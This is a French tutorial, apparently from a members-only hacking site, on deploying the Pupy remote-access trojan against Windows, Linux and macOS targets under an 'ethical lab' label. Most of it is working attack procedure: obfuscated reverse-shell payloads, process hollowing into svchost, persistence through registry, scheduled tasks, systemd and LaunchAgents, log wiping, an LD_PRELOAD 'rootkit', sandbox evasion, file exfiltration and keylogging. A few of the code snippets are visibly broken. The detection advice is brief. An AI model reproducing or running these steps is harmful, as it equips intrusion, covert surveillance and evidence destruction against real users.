⚖️ Charte Éthique Apache
Yo, Apache membre ! Voici Pupy RAT 2025, par Platon-y pour pctamalou.fr. Ce tuto déploie Pupy en lab éthique sur Kali Linux, avec payloads multi-OS obfuscés (Cython), persistance avancée, techniques anti-forensiques, serveur C2 sécurisé, exfiltration, keylogging, et dashboard Flask. Lab uniquement – pas d’accès non autorisé ! Respectez les lois (ex. France : article 323-1). Hackez propre !
Pupy RAT 2025 🐶💾
Exclusivité membres : déploiez Pupy RAT en lab éthique sur Kali Linux. Payloads multi-OS avec obfuscation Cython, persistance (Windows/Linux/macOS), techniques anti-forensiques, serveur C2 sécurisé, exfiltration, keylogging, et monitoring Flask. Inclut sécurisation et rapport pro. 100% éthique ! ⚡️
1️⃣ Introduction à Pupy RAT 🐶
Pupy est un RAT open-source, modulaire, multi-OS, pour tests de pénétration éthiques. Ce tuto exclusif guide les membres pour déployer Pupy sur Kali Linux 2024.4 en lab, avec payloads obfuscés (Cython, noms aléatoires, process hollowing), persistance multi-OS, anti-forensique (cleanup, rootkit, détection sandbox), serveur C2 sécurisé, exfiltration, keylogging, et dashboard Flask.
Objectifs
- Installer Pupy avec Cython sur Kali.
- Générer payloads multi-OS avec obfuscation.
- Configurer serveur C2 (HTTPS, DNS).
- Établir persistance multi-OS.
- Implémenter anti-forensique.
- Exfiltrer données, keylogging, monitoring.
- Sécuriser contre Pupy.
2️⃣ Setup du Lab 🔧
Configurez un lab isolé.
+-----------------------------------------+
| [Réseau Lab Isolé] |
| | |
| v |
| [Kali Linux: 172.16.0.101] |
| | (Attacker, C2 Server) |
| v |
| [Target: 172.16.0.102] |
| (Windows/Linux/macOS VM) |
+-----------------------------------------+
Variables d’Environnement
# ~/.bashrc
export KALI_IP=172.16.0.101
export TARGET_IP=172.16.0.102
export C2_PORT=443
export LHOST=172.16.0.101
export LPORT=4444
Configuration
- Kali Linux: VM Kali 2024.4, VirtualBox, NAT Network.
sudo ifconfig eth0 $KALI_IP netmask 255.255.255.0 up sudo apt update && sudo apt install -y python3 python3-pip git netcat openssl gcc cython3 pip3 install flask - Cibles: Windows 10 (19043), Ubuntu 20.04, macOS Ventura, IP 172.16.0.102.
# Ubuntu sudo ifconfig eth0 $TARGET_IP netmask 255.255.255.0 up # Windows netsh interface ip set address name="Ethernet" static $TARGET_IP 255.255.255.0 # macOS sudo ifconfig en0 inet $TARGET_IP netmask 255.255.255.0
3️⃣ Installation de Pupy 🛠️
Clonez Pupy, installez avec Cython.
git clone https://github.com/n1nj4sec/pupy.git /opt/pupy
cd /opt/pupy
pip3 install -r requirements.txt
pip3 install cython
cython3 --embed -o pupy_cy.c pupy/pupy.py
gcc -I /usr/include/python3.8 -o pupy_cy pupy_cy.c -lpython3.8 -lpthread -lm -lutil -ldl
Configuration
# /opt/pupy/pupy/pupy.conf
[main]
host=$LHOST
port=$C2_PORT
transport=ssl
4️⃣ Génération de Payloads 🐍
Générez des payloads multi-OS avec obfuscation intelligente. Les payloads complets sont générés via pupygen.py.
Obfuscation Intelligente
Utilisez Cython pour compiler, noms aléatoires pour variabiliser le code, et base64 pour encoder.
# random_names.py
import random
import string
def randomize_names(code):
var_map = {f"var{i}": ''.join(random.choices(string.ascii_letters, k=12)) for i in range(100)}
for old, new in var_map.items():
code = code.replace(old, new)
return code
with open('/tmp/pupy_payload.py', 'r') as f:
code = f.read()
with open('/tmp/pupy_payload_obf.py', 'w') as f:
f.write(randomize_names(code))
Linux Payload (Cython)
Générez un payload Python, compilez avec Cython, obfuscatez avec noms aléatoires et base64.
# Générer payload
cd /opt/pupy
python3 pupygen.py -f py -o /tmp/pupy_linux.py --host $LHOST:$C2_PORT --transport ssl
# Compiler avec Cython
cython3 --embed -o /tmp/pupy_linux_cy.c /tmp/pupy_linux.py
gcc -I /usr/include/python3.8 -o /tmp/pupy_linux /tmp/pupy_linux_cy.c -lpython3.8 -lpthread -lm -lutil -ldl
# Obfuscation
python3 random_names.py
echo "import base64;exec(base64.b64decode('$(base64 /tmp/pupy_payload_obf.py)'))" > /tmp/pupy_linux_final.py
# Exemple de structure payload (simplifié)
import socket
import ssl
import base64
def connect_c2():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = context.wrap_socket(s)
s.connect(('$LHOST', $C2_PORT))
while True:
cmd = s.recv(1024).decode()
if cmd == 'exit':
break
result = subprocess.check_output(cmd, shell=True)
s.send(result)
s.close()
connect_c2()
Windows Payload (Process Hollowing)
Générez un EXE avec hollowing dans svchost.exe, compressez avec UPX.
# Générer payload
python3 pupygen.py -f exe -o /tmp/pupy_win.exe --host $LHOST:$C2_PORT --transport ssl
python3 pupygen.py -f exe -o /tmp/pupy_win_hollow.exe --host $LHOST:$C2_PORT --transport ssl --hollow svchost.exe
# Compresser
sudo apt install upx-ucl
upx --best /tmp/pupy_win_hollow.exe
# Exemple de structure payload (simplifié, traduit en Python pour clarté)
import ctypes
import win32api
def hollow_process():
target = "svchost.exe"
si = ctypes.WinDLL('kernel32').CreateProcessA(..., target, ...)
payload = base64.b64decode('PAYLOAD_ENCODED_HERE')
ctypes.WinDLL('kernel32').WriteProcessMemory(si.hProcess, payload)
ctypes.WinDLL('kernel32').ResumeThread(si.hThread)
hollow_process()
macOS Payload
Générez un payload Python, compilez avec Cython, obfuscatez.
# Générer payload
python3 pupygen.py -f py -o /tmp/pupy_macos.py --host $LHOST:$C2_PORT --transport ssl
# Compiler avec Cython
cython3 --embed -o /tmp/pupy_macos_cy.c /tmp/pupy_macos.py
gcc -I /usr/include/python3.8 -o /tmp/pupy_macos /tmp/pupy_macos_cy.c -lpython3.8 -lpthread -lm -lutil -ldl
# Obfuscation
python3 random_names.py
echo "import base64;exec(base64.b64decode('$(base64 /tmp/pupy_payload_obf.py)'))" > /tmp/pupy_macos_final.py
# Exemple de structure payload (simplifié)
import socket
import ssl
def connect_c2():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = context.wrap_socket(s)
s.connect(('$LHOST', $C2_PORT))
while True:
cmd = s.recv(1024).decode()
if cmd == 'exit':
break
result = subprocess.check_output(cmd, shell=True)
s.send(result)
s.close()
connect_c2()
Transfert au Cible
# Linux
scp /tmp/pupy_linux_final.py user@$TARGET_IP:/tmp/
# Windows
python3 -m http.server 8000
powershell -c "Invoke-WebRequest -Uri http://$KALI_IP:8000/pupy_win_hollow.exe -OutFile C:\Temp\pupy_win_hollow.exe"
# macOS
scp /tmp/pupy_macos_final.py user@$TARGET_IP:/tmp/
5️⃣ Serveur C2 🔗
Certificats SSL
openssl req -x509 -newkey rsa:4096 -keyout /opt/pupy/key.pem -out /opt/pupy/cert.pem -days 365 -nodes -subj "/C=FR/ST=Apache/L=Nomade/O=PCTamalou/CN=pupy.local"
Lancer le Serveur C2
cd /opt/pupy
python3 pupysh.py --host $LHOST --port $C2_PORT --transport ssl --ssl-cert /opt/pupy/cert.pem --ssl-key /opt/pupy/key.pem
DNS Tunneling
# /opt/pupy/pupy/pupy.conf
[main]
transport=dns
dns_domain=pupy.local
6️⃣ Persistance Multi-OS 🔄
Windows
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ApachePupy /t REG_SZ /d "C:\Temp\pupy_win_hollow.exe" /f
schtasks /create /tn ApachePupy /tr "C:\Temp\pupy_win_hollow.exe" /sc onlogon /ru System
sc create ApachePupy binPath= "C:\Temp\pupy_win_hollow.exe" start= auto
Linux
echo "@reboot /tmp/pupy_linux" | crontab -
cat <<EOF > /etc/systemd/system/apachepupy.service
[Unit]
Description=Apache Pupy Service
After=network.target
[Service]
ExecStart=/tmp/pupy_linux
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable apachepupy.service
echo "/tmp/pupy_linux &" >> ~/.bashrc
macOS
cat <<EOF > ~/Library/LaunchAgents/com.apache.pupy.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apache.pupy</string>
<key>Program</key>
<string>/tmp/pupy_macos</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOF
launchctl load ~/Library/LaunchAgents/com.apache.pupy.plist
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/tmp/pupy_macos", hidden:false}'
7️⃣ Anti-Forensique 🕵️
Cleanup Logs
# Linux
sudo truncate -s 0 /var/log/syslog
sudo truncate -s 0 /var/log/auth.log
# Windows
wevtutil cl System
wevtutil cl Security
# macOS
sudo rm -f /var/log/system.log
Rootkit Userland (LD_PRELOAD)
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char *getenv(const char *name) {
if (strcmp(name, "LD_PRELOAD") == 0) return NULL;
return NULL;
}
gcc -shared -fPIC rootkit.c -o /tmp/rootkit.so
export LD_PRELOAD=/tmp/rootkit.so
Détection Sandbox/VM
import os
def is_sandbox():
if os.path.exists("/.dockerenv") or os.path.exists("/proc/vz"):
return True
if os.popen("dmidecode -s system-manufacturer").read().lower().find("virtual") != -1:
return True
return False
if is_sandbox():
exit(0)
cat sandbox_detect.py /tmp/pupy_linux_final.py > /tmp/pupy_linux_sandbox.py
8️⃣ Exploitation 💥
Exécuter Payload
# Linux
ssh user@$TARGET_IP "python3 /tmp/pupy_linux_sandbox.py"
# Windows
C:\Temp\pupy_win_hollow.exe
# macOS
ssh user@$TARGET_IP "/tmp/pupy_macos_final.py"
Commandes C2
clients
session <id>
get_file /etc/passwd /tmp/passwd_exfil
keylogger_start
keylogger_dump
keylogger_stop
9️⃖Flask Dashboard 📊
from flask import Flask, render_template
import subprocess
import json
app = Flask(__name__)
def get_pupy_logs():
try:
logs = subprocess.check_output("tail -n 50 /opt/pupy/pupy.log", shell=True).decode()
return logs.split("\n")
except:
return ["No logs available"]
@app.route('/')
def dashboard():
logs = get_pupy_logs()
sessions = json.loads(subprocess.check_output("python3 /opt/pupy/pupysh.py -c 'clients' -j", shell=True).decode())
return render_template('dashboard.html', logs=logs, sessions=sessions)
if __name__ == '__main__":
app.run(host='0.0.0.0', port=80)
<!DOCTYPE html>
<html>
<head>
<title>Pupy Dashboard</title>
<style>
body { background: #1a1a1a; color: #39ff14; font-family: 'Courier New', monospace; text-align: center; }
h1 { text-shadow: 0 0 10px #8a2be2; }
#logs { background: #4a4a4a; padding: 10px; height: 300px; overflow-y: auto; }
</style>
</head>
<body>
<h1>Pupy RAT 2025: Apache Control</h1>
<p>Sessions: {{ sessions|length }}</p>
<div id="logs">
{% for log in logs %}
<plog>{{ log }}</p>
{% endfor %}
</div>
</body>
</html>
sudo python3 dashboard.py
# Accéder
http://$KALI_IP:80
🔟 Sécurisation 🛡️
Détection
- Réseau: Surveiller $LHOST:$C2_PORT.
- Processus: Chercher pupy_linux, pupy_win_hollow.exe, pupy_macos.
- Logs: Vérifier syslog, Event Viewer, system.log.
Suppression
# Linux
ps aux | grep pupy
kill -9 <pid>
rm /tmp/pupy_linux_sandbox.py
# Windows
tasklist | findstr pupy
taskkill /IM pupy_win_hollow.exe /F
del C:\Temp\pupy_win_hollow.exe
# macOS
ps aux | grep pupy
kill -9 <pid>
rm /tmp/pupy_macos_final.py
Prévention
- Firewall: Bloquer ports non autorisés.
- Antivirus: Mettre à jour signatures.
- Patchs: Maintenir systèmes à jour.
- Isolation: Réseaux segmentés.
📖 Rapport Pro 📊
## Rapport de Test Pupy RAT
- **Cible**: $TARGET_IP
- **Durée**: 2h
- **Résultat**: Session C2 établie, exfiltration réussie
- **OS**: [Windows/Linux/macOS]
- **Recommandations**:
- Surveiller trafic réseau
- Mettre à jour antivirus
- Segmenter réseau
- Former utilisateurs
❓ FAQ Apache 🔧
Q: Puis-je tester en prod ?
A: Non, lab-only avec autorisation écrite.
Q: Payload ne se connecte pas ?
A: Vérifiez $LHOST, $C2_PORT, firewall.
Q: Détecter Pupy ?
A: Surveillez processus, trafic, logs.